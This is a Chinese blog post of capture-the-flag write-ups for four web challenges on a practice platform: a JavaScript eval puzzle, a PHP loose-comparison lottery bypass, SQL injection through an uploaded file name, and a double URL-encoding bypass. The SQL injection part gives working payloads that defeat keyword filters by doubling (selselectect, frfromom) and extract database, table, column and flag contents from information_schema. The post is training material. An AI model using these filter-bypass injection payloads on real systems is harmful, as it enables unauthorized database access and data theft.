web 攻防世界2

最新推荐文章于 2024-05-13 10:30:32 发布
最新推荐文章于 2024-05-13 10:30:32 发布
阅读量232 收藏
点赞数 1
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43741181/article/details/101031525
版权

1.NaNNaNNaNNaN-Batman

打开题目提示下载一个附件,下载为一个文件,记事本打开

有地方乱码了,这里看到<script>标签,用浏览器打开看会不会弹出来

打开之后是一个输入框,输入什么都没用,再去看看文件

这里第一段是给 _ 赋了一个函数,_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit\'_ns=[t,n,r,i];for(o=0;o<13;++o){    [0]);.splice(0,1)}}}    \'
 最后发现了一个eval函数,它没执行$函数。这里用alert代替,弹出了源码

整理一下

function $(){
var e=document.getElementById("c").value;
if(e.length==16)
   if(e.match(/^be0f23/)!=null)
      if(e.match(/233ac/)!=null)
         if(e.match(/e98aa$/)!=null)
             if(e.match(/c7be9/)!=null){
             var t=["fl","s_a","i","e}"];
             var n=["a","_h0l","n"];
             var r=["g{","e","_0"];
             var i=["it'","_","n"];
             var s=[t,n,r,i];
             for(var o=0;o<13;++o){
             document.write(s[o%4][0]);s[o%4].splice(0,1)}
             }
}
document.write('<input id="c"><button οnclick=$()>Ok</button>');
delete _
判断一下这里的正则,^为首,$为尾。

即为be0f233ac7be98aa,把alert改为eval,输入即得。

 

  2.攻防世界 lottery

题目打开先浏览了一下各个网页作用,发现

大概就是需要得到这么多钱来买flag,而方式是猜对彩票的数值。

下载下提供的源码后,发现robots.txt中

即提示git源码泄露,但这里题目给了源代码,审计过后发现判断函数在api.php中

发现flag条件

这里需要做手脚了让输入的数与随机数相等, 这里用==判断,即bool型,可以和任何数据弱类型相等,

抓包改包

把七位数都变为true,执行,发现钱数已经改变

不够就再来一次...

买到了flag

这种题真是好有意思,学到了。

3.攻防世界upload

注册先,邮箱啥的就1@.1这种就可以判断成功了,发现上传按钮

我试着传了一张照片上去,成功了,试试直接传个木马看看,不得行,抓包看看,题目好像被搞了....

路径也找不到,搞不动.....

这竟然是个注入题..大佬是说注入点在文件名上,意思这里文件名连接到数据库,

当输入文件名为注入语句时,发现并没有反应,且出现上传成功,
尝试多次发现过滤的时select和from,所以利用selselectect和frfromom进行绕过,

这里用到了CONV,substr,hex,
不转成数字,完全没有回显结果,所以用hex先将字符转换成16进制,然后用CONV函数将16进制转化为10进制,依次获取子串的12位,用substr截取12是因为一旦过长,会用科学计数法表示

数据库payload:1'+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg

得到后转成16进制,再hex

第二部分为

1'+(selselectect CONV(substr(hex(dAtaBase()),13,12),16,10))+'.jpg

解码得到

即数据库为web_upload

接下来爆表,列

1’+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema=‘web_upload’)),1,12),16,10))+’.jpg

这里从1变到37才完,发现表为

hello_flag_is_here

继续爆列

1’+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name=‘hello_flag_is_here’)),1,12),16,10))+’.jpg
1-13

发现为 i_am_flag

爆字段即可

1’+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),1,12),16,10))+’.jpg

1-25

!!_@m_Th.e_F!lag

直接提交即可,注意在构造sql语句中的双写。

4.攻防世界PHP2

这题刚进来就难住了...

各种尝试无果,看了wp发现源码在index.phps中。。。

读一下代码,第一步判断id===admin的话直接退出,判断成功则判断urldecode后的id和传入的id是否相同

这里考察了一个知识点,在你向浏览器后台传数据时,会将你提交除数字外的先进行一次urldecode,而这个函数又自己进行一次urldecode,

则这里需要传入admin编码后再次编码的值,只需编第一位即可

a -> %61-> %2561

传入%2561即可。

 

 

 

 

 

 

 

 

 

 

 

c3g07f
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 web2 解题详析
等风来
05-25 3389
可通过逆向加密算法的步骤,对 $miwen 进行相反的操作,即先使用 str_rot13 还原,然后使用 strrev 翻转,再使用 base64 解码,最后对每个字符的 ASCII 值减 1 ,再进行翻转即可得到 flag。其中,str_rot13 是一个简单的字符替换算法,将每个字符替换为它在字母表中向后移动 13 位后对应的字符。这个算法是一种经典的简单加密方法,可以用来隐藏字符串的真实含义。这段代码定义了一个函数 encode,接受一个字符串参数 $str,并返回对其进行加密后的结果。
攻防世界Webweb2
Light_inthe_eyes的博客
10-16 94
打开网址是一串代码,代码审计: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1);
攻防世界-web2 (NSCTF-WEB)
路baby的博客
07-12 1917
今天在做题无疑发现有个比较有意思(被多个平台收录过) 非常适合编码,web,密码初学者 所以今天就把这道题给你们详细整理出来
【愚公系列】2023年05月 攻防世界-Webweb2)
时光隧道
05-25 8488
PHP中有很多加密算法可以使用,常见的包括MD5、SHA1、SHA256、SHA512、AES等等。这些算法都有不同的特点和用途,比如MD5和SHA1可以用于生成密码的散列值,而AES可以用于对数据进行加密和解密。在实际使用中需要根据具体需求选择合适的加密算法。
【愚公系列】2023年05月 攻防世界-Webweb2)_攻防世界web2
最新发布
2401_84973131的博客
05-13 385
PHP中有很多加密算法可以使用,常见的包括MD5、SHA1、SHA256、SHA512、AES等等。这些算法都有不同的特点和用途,比如MD5和SHA1可以用于生成密码的散列值,而AES可以用于对数据进行加密和解密。在实际使用中需要根据具体需求选择合适的加密算法。ASCII码(American Standard Code for Information Interchange)是一种用于计算机编码的字符集。
【愚公系列】2023年05月 攻防世界-MOBILE(app2)
热门推荐
时光隧道
12-10 3万+
下面介绍两个反编译工具jadx是一个用于反编译Android APK文件的开源工具,静态反编译,查找索引功能强大jeb和IDA很像,属于动态调试,可以看java汇编也可以生成伪代码,还可以动态attach到目标调试对于so文件的逆向工具选择IDA逆向工具是一款反汇编器,被广泛应用于软件逆向工程领域,能够反汇编各种不同平台的二进制程序代码,并还原成可读的汇编代码。
攻防世界-WEB2
陈艺秋的博客
07-11 608
然后,通过 ord() 函数获取 $_c 字符的 ASCII 值,并+ 1,然后利用chr()函数,将数据转换为字符后重新赋值给$c。循环结束后,将 $_ 变量进行base64编码,然后再利用strrev函数倒序,最后使用ROT13 编码,return返回最终值。接着使用一个for循环,接着,遍历 $_o 中的每个字符。设定临时参数$_0初值为0,退出条件为。将接收的变量利用strrev函数进行字符串反转,并赋值给$_o。将$_c 存储的字符追加到 $_ 变量中。表示下标的字符,存储在 $_c 变量中。
Web攻防世界(二)
Vi_vids的博客
10-16 236
CTF-Web Web方向(攻防世界——找FLAG) 前期在bilibili学习Web知识、基本漏洞原理、burp的用法…(菜鸟第二天) simple_php 该题目为一段php代码 采用的是GET请求方式,所以在URL后面添加/?a=’’&b=2345h,即可得到flag get_post HTTP协议常用的请求方式有两种:GET和POST GET请求方式就是在查看源码后获得的变量直接在URL上赋值 而POST请求方式则不可以这样 在本题中考察两种方法的使用 backup 查找index.php
攻防世界看雪看雪看雪杂项
11-20
在IT安全领域,尤其是网络安全竞赛(如CTF,Capture The Flag)中,"攻防世界"是一个颇受欢迎的在线平台,旨在提供各种安全挑战来提升参赛者的技能。在这个平台上,"杂项"(Miscellaneous)类题目通常涵盖广泛的知识...
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
XCTF攻防世界web.doc
09-19
【XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
攻防世界RE 流浪者 wp
03-15
攻防世界RE 流浪者 wp
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
Web安全攻防世界07 Web2
weixin_42789937的博客
12-18 405
Web安全攻防世界07 Web2,依旧是php0基础的小白自己解题,内容相比其他大佬的WP会稍微啰嗦一些~
攻防世界Web题解析(难度2)
m0_63138919的博客
08-03 835
本文为攻防世界Web题难度为2的解题思路和方法
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1272
攻防世界web新手区部分wp
攻防世界】PHP2
m0_74979597的博客
07-10 2778
又因为编码后参数%61dmin中存在特殊字符%,浏览器会自动进行URL解码,所以我们对%进行编码:%25。网站是由前端,后端,数据库,服务器,域名,其他组件(图像、视频、第三方API、安全认证等)组成;总之:可能考察php脚本在服务器上运行,php脚本文件的经典路径;会在服务器上执行,生成动态的HTML页面,然后将页面发送给用户的浏览器进行显示。urldecode是PHP函数,解码经过URL编码的字符串,解码回原始的形式;果然在这里,通常不可能访问到一般网站的脚本路径,更不用说是脚本的源代码;
攻防世界】mobile app2 writeup
2301_77295404的博客
12-29 376
但是这里我们用另一种方法。这个程序有多个Activity,启动顺序是MainActivity得到的输入传入并启动Second Activity,在SecondActivity的Oncreate函数中调用So文件的doRawData,看得到的结果是否与既定的字符串相等。doRawData的代码中使用AES加密,加密的密钥在代码中有就是thisisatestkey==。上面的命令启动app,下面的命令调用activity,然后你就会在手机上看到flag:Cas3_0f_A_CAK3。
攻防世界web2
windcandy的博客
11-13 377
攻防世界web2的wp
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值